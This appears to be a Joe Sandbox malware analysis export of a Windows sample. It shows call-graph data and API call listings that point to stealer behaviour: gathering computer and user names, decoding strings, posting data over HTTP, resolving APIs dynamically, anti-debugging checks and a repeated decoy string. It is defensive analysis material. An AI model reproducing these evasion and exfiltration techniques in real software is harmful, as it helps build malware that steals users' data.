27360->27363 27364 41a820 2 API calls 27361->27364 27362->27340 27365 41a8a0 lstrcpy 27363->27365 27366 4159ba 27364->27366 27368 415a34 27365->27368 27367 401670 lstrcpy 27366->27367 27367->27376 27369 41a820 2 API calls 27368->27369 27370 415a43 27369->27370 27372 41a820 2 API calls 27370->27372 27371->27340 27373 415a52 27372->27373 27375 401670 lstrcpy 27373->27375 27374->27340 27375->27376 27376->26435 27377->27340 27378->27340 27379->27340 27381 417553 GetVolumeInformationA 27380->27381 27382 41754c 27380->27382 27386 417591 27381->27386 27382->27381 27383 4175fc GetProcessHeap HeapAlloc 27384 417619 27383->27384 27385 417628 wsprintfA 27383->27385 27387 41a740 lstrcpy 27384->27387 27388 41a740 lstrcpy 27385->27388 27386->27383 27389 415da7 27387->27389 27388->27389 27389->26456 27391 41a7a0 lstrcpy 27390->27391 27392 404899 27391->27392 27597 4047b0 27392->27597 27394 4048a5 27395 41a740 lstrcpy 27394->27395 27396 4048d7 27395->27396 27397 41a740 lstrcpy 27396->27397 27398 4048e4 27397->27398 27399 41a740 lstrcpy 27398->27399 27400 4048f1 27399->27400 27401 41a740 lstrcpy 27400->27401 27402 4048fe 27401->27402 27403 41a740 lstrcpy 27402->27403 27404 40490b InternetOpenA StrCmpCA 27403->27404 27405 404944 27404->27405 27406 404ecb InternetCloseHandle 27405->27406 27605 418b60 27405->27605 27408 404ee8 27406->27408 27620 409ac0 CryptStringToBinaryA 27408->27620 27409 404963 27613 41a920 27409->27613 27412 404976 27414 41a8a0 lstrcpy 27412->27414 27420 40497f 27414->27420 27415 41a820 2 API calls 27416 404f05 27415->27416 27417 41a9b0 4 API calls 27416->27417 27419 404f1b 27417->27419 27418 404f27 moneypunct 27422 41a7a0 lstrcpy 27418->27422 27421 41a8a0 lstrcpy 27419->27421 27423 41a9b0 4 API calls 27420->27423 27421->27418 27434 404f57 27422->27434 27424 4049a9 27423->27424 27425 41a8a0 lstrcpy 27424->27425 27426 4049b2 27425->27426 27427 41a9b0 4 API calls 27426->27427 27428 4049d1 27427->27428 27429 41a8a0 lstrcpy 27428->27429 27430 4049da 27429->27430 27431 41a920 3 API calls 27430->27431 27432 4049f8 27431->27432 27433 41a8a0 lstrcpy 27432->27433 27435 404a01 27433->27435 27434->26459 27436 41a9b0 4 API calls 27435->27436 27437 404a20 27436->27437 27438 41a8a0 lstrcpy 27437->27438 27439 404a29 27438->27439 27440 41a9b0 4 API calls 27439->27440 27441 404a48 27440->27441 27442 41a8a0 lstrcpy 27441->27442 27443 404a51 27442->27443 27444 41a9b0 4 API calls 27443->27444 27445 404a7d 27444->27445 27446 41a920 3 API calls 27445->27446 27447 404a84 27446->27447 27448 41a8a0 lstrcpy 27447->27448 27449 404a8d 27448->27449 27450 404aa3 InternetConnectA 27449->27450 27450->27406 27451 404ad3 HttpOpenRequestA 27450->27451 27453 404b28 27451->27453 27454 404ebe InternetCloseHandle 27451->27454 27455 41a9b0 4 API calls 27453->27455 27454->27406 27456 404b3c 27455->27456 27457 41a8a0 lstrcpy 27456->27457 27458 404b45 27457->27458 27459 41a920 3 API calls 27458->27459 27460 404b63 27459->27460 27461 41a8a0 lstrcpy 27460->27461 27462 404b6c 27461->27462 27463 41a9b0 4 API calls 27462->27463 27464 404b8b 27463->27464 27465 41a8a0 lstrcpy 27464->27465 27466 404b94 27465->27466 27467 41a9b0 4 API calls 27466->27467 27468 404bb5 27467->27468 27469 41a8a0 lstrcpy 27468->27469 27470 404bbe 27469->27470 27471 41a9b0 4 API calls 27470->27471 27472 404bde 27471->27472 27473 41a8a0 lstrcpy 27472->27473 27474 404be7 27473->27474 27475 41a9b0 4 API calls 27474->27475 27476 404c06 27475->27476 27477 41a8a0 lstrcpy 27476->27477 27478 404c0f 27477->27478 27479 41a920 3 API calls 27478->27479 27480 404c2d 27479->27480 27481 41a8a0 lstrcpy 27480->27481 27482 404c36 27481->27482 27483 41a9b0 4 API calls 27482->27483 27484 404c55 27483->27484 27485 41a8a0 lstrcpy 27484->27485 27486 404c5e 27485->27486 27487 41a9b0 4 API calls 27486->27487 27488 404c7d 27487->27488 27489 41a8a0 lstrcpy 27488->27489 27490 404c86 27489->27490 27491 41a920 3 API calls 27490->27491 27492 404ca4 27491->27492 27493 41a8a0 lstrcpy 27492->27493 27494 404cad 27493->27494 27495 41a9b0 4 API calls 27494->27495 27496 404ccc 27495->27496 27497 41a8a0 lstrcpy 27496->27497 27498 404cd5 27497->27498 27499 41a9b0 4 API calls 27498->27499 27500 404cf6 27499->27500 27501 41a8a0 lstrcpy 27500->27501 27502 404cff 27501->27502 27503 41a9b0 4 API calls 27502->27503 27504 404d1f 27503->27504 27505 41a8a0 lstrcpy 27504->27505 27506 404d28 27505->27506 27507 41a9b0 4 API calls 27506->27507 27508 404d47 27507->27508 27509 41a8a0 lstrcpy 27508->27509 27510 404d50 27509->27510 27511 41a920 3 API calls 27510->27511 27512 404d6e 27511->27512 27513 41a8a0 lstrcpy 27512->27513 27514 404d77 27513->27514 27515 41a740 lstrcpy 27514->27515 27516 404d92 27515->27516 27517 41a920 3 API calls 27516->27517 27518 404db3 27517->27518 27519 41a920 3 API calls 27518->27519 27520 404dba 27519->27520 27521 41a8a0 lstrcpy 27520->27521 27522 404dc6 27521->27522 27523 404de7 lstrlenA 27522->27523 27524 404dfa 27523->27524 27525 404e03 lstrlenA 27524->27525 27619 41aad0 27525->27619 27527 404e13 HttpSendRequestA 27528 404e32 InternetReadFile 27527->27528 27529 404e67 InternetCloseHandle 27528->27529 27533 404e5e 27528->27533 27531 41a800 27529->27531 27531->27454 27532 41a9b0 4 API calls 27532->27533 27533->27528 27533->27529 27533->27532 27534 41a8a0 lstrcpy 27533->27534 27534->27533 27629 41aad0 27535->27629 27537 4117c4 StrCmpCA 27538 4117d7 27537->27538 27539 4117cf ExitProcess 27537->27539 27540 4117e7 strtok_s 27538->27540 27543 4117f4 27540->27543 27541 4119c2 27541->26461 27542 41199e strtok_s 27542->27543 27543->27541 27543->27542 27544 4118ad StrCmpCA 27543->27544 27545 4118cf StrCmpCA 27543->27545 27546 4118f1 StrCmpCA 27543->27546 27547 411951 StrCmpCA 27543->27547 27548 411970 StrCmpCA 27543->27548 27549 411913 StrCmpCA 27543->27549 27550 411932 StrCmpCA 27543->27550 27551 41185d StrCmpCA 27543->27551 27552 41187f StrCmpCA 27543->27552 27553 41a820 lstrlenA lstrcpy 27543->27553 27554 41a820 2 API calls 27543->27554 27544->27543 27545->27543 27546->27543 27547->27543 27548->27543 27549->27543 27550->27543 27551->27543 27552->27543 27553->27543 27554->27542 27555->26467 27556->26469 27557->26475 27558->26477 27559->26483 27560->26485 27561->26489 27562->26493 27563->26497 27564->26503 27565->26505 27566->26509 27567->26523 27568->26527 27569->26526 27570->26522 27571->26526 27572->26544 27573->26529 27574->26531 27575->26535 27576->26540 27577->26541 27578->26547 27579->26555 27580->26557 27581->26579 27582->26584 27583->26583 27584->26580 27585->26583 27586->26593 27589 41a7a0 lstrcpy 27588->27589 27590 401683 27589->27590 27591 41a7a0 lstrcpy 27590->27591 27592 401695 27591->27592 27593 41a7a0 lstrcpy 27592->27593 27594 4016a7 27593->27594 27595 41a7a0 lstrcpy 27594->27595 27596 4015a3 27595->27596 27596->27317 27625 401030 27597->27625 27601 404838 lstrlenA 27628 41aad0 27601->27628 27603 404848 InternetCrackUrlA 27604 404867 27603->27604 27604->27394 27606 41a740 lstrcpy 27605->27606 27607 418b74 27606->27607 27608 41a740 lstrcpy 27607->27608 27609 418b82 GetSystemTime 27608->27609 27610 418b99 27609->27610 27611 41a7a0 lstrcpy 27610->27611 27612 418bfc 27611->27612 27612->27409 27614 41a931 27613->27614 27615 41a988 27614->27615 27617 41a968 lstrcpy lstrcatA 27614->27617 27616 41a7a0 lstrcpy 27615->27616 27618 41a994 27616->27618 27617->27615 27618->27412 27619->27527 27621 409af9 LocalAlloc 27620->27621 27622 404eee 27620->27622 27621->27622 27623 409b14 CryptStringToBinaryA 27621->27623 27622->27415 27622->27418 27623->27622 27624 409b39 LocalFree 27623->27624 27624->27622 27626 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27625->27626 27627 41aad0 27626->27627 27627->27601 27628->27603 27629->27537 27756 416ab1 903 API calls 27725 4069f3 7 API calls 27698 22bae93 43 API calls 2 library calls 27699 22b0297 131 API calls 27758 41cafe 219 API calls 5 library calls 27760 22bcce9 162 API calls getSystemCP 27794 22b19e7 StrCmpCA ExitProcess strtok_s strtok_s 27795 22b35e4 9 API calls 26200 401190 26207 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26200->26207 26202 40119e 26203 4011cc 26202->26203 26209 417850 GetProcessHeap HeapAlloc GetUserNameA 26202->26209 26205 4011b7 26205->26203 26206 4011c4 ExitProcess 26205->26206 26208 417939 26207->26208 26208->26202 26210 4178c3 26209->26210 26210->26205 27761 22b30f9 7 API calls 27762 22af8f1 32 API calls 27763 41ce9f 69 API calls __amsg_exit 27701 4088a4 RaiseException task __CxxThrowException@8 27702 4180a5 GetProcessHeap HeapFree 27727 22b13c7 strtok_s strtok_s 27729 41b9b0 RtlUnwind 27768 22b3823 8 API calls 27769 22b30d0 9 API calls

                                  Control-flow Graph

                                  APIs
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                  • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                  • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                  • strlen.MSVCRT ref: 004046F0
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 2127927946-2218711628
                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 663 419860-419874 call 419750 666 419a93-419af2 LoadLibraryA * 5 663->666 667 41987a-419a8e call 419780 GetProcAddress * 21 663->667 669 419af4-419b08 GetProcAddress 666->669 670 419b0d-419b14 666->670 667->666 669->670 672 419b46-419b4d 670->672 673 419b16-419b41 GetProcAddress * 2 670->673 674 419b68-419b6f 672->674 675 419b4f-419b63 GetProcAddress 672->675 673->672 676 419b71-419b84 GetProcAddress 674->676 677 419b89-419b90 674->677 675->674 676->677 678 419bc1-419bc2 677->678 679 419b92-419bbc GetProcAddress * 2 677->679 679->678
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,00750AB0), ref: 004198A1
                                  • GetProcAddress.KERNEL32(75900000,00750C90), ref: 004198BA
                                  • GetProcAddress.KERNEL32(75900000,00750BA0), ref: 004198D2
                                  • GetProcAddress.KERNEL32(75900000,00750B70), ref: 004198EA
                                  • GetProcAddress.KERNEL32(75900000,00750C18), ref: 00419903
                                  • GetProcAddress.KERNEL32(75900000,00747988), ref: 0041991B
                                  • GetProcAddress.KERNEL32(75900000,007463E0), ref: 00419933
                                  • GetProcAddress.KERNEL32(75900000,007465A0), ref: 0041994C
                                  • GetProcAddress.KERNEL32(75900000,00750B58), ref: 00419964
                                  • GetProcAddress.KERNEL32(75900000,00750BB8), ref: 0041997C
                                  • GetProcAddress.KERNEL32(75900000,00750CF0), ref: 00419995
                                  • GetProcAddress.KERNEL32(75900000,00750CA8), ref: 004199AD
                                  • GetProcAddress.KERNEL32(75900000,00746540), ref: 004199C5
                                  • GetProcAddress.KERNEL32(75900000,00750A20), ref: 004199DE
                                  • GetProcAddress.KERNEL32(75900000,00750BD0), ref: 004199F6
                                  • GetProcAddress.KERNEL32(75900000,00746560), ref: 00419A0E
                                  • GetProcAddress.KERNEL32(75900000,00750B88), ref: 00419A27
                                  • GetProcAddress.KERNEL32(75900000,00750D08), ref: 00419A3F
                                  • GetProcAddress.KERNEL32(75900000,00746580), ref: 00419A57
                                  • GetProcAddress.KERNEL32(75900000,00750CC0), ref: 00419A70
                                  • GetProcAddress.KERNEL32(75900000,007462E0), ref: 00419A88
                                  • LoadLibraryA.KERNEL32(00750A98,?,00416A00), ref: 00419A9A
                                  • LoadLibraryA.KERNEL32(00750C00,?,00416A00), ref: 00419AAB
                                  • LoadLibraryA.KERNEL32(00750B28,?,00416A00), ref: 00419ABD
                                  • LoadLibraryA.KERNEL32(00750CD8,?,00416A00), ref: 00419ACF
                                  • LoadLibraryA.KERNEL32(00750A38,?,00416A00), ref: 00419AE0
                                  • GetProcAddress.KERNEL32(75070000,00750C30), ref: 00419B02
                                  • GetProcAddress.KERNEL32(75FD0000,00750A50), ref: 00419B23
                                  • GetProcAddress.KERNEL32(75FD0000,00750A68), ref: 00419B3B
                                  • GetProcAddress.KERNEL32(75A50000,00750A80), ref: 00419B5D
                                  • GetProcAddress.KERNEL32(74E50000,00746320), ref: 00419B7E
                                  • GetProcAddress.KERNEL32(76E80000,007478D8), ref: 00419B9F
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: u$ ct$8u$@et$NtQueryInformationProcess$Pu$`et$hu$bt$ct
                                  • API String ID: 2238633743-236823380
                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
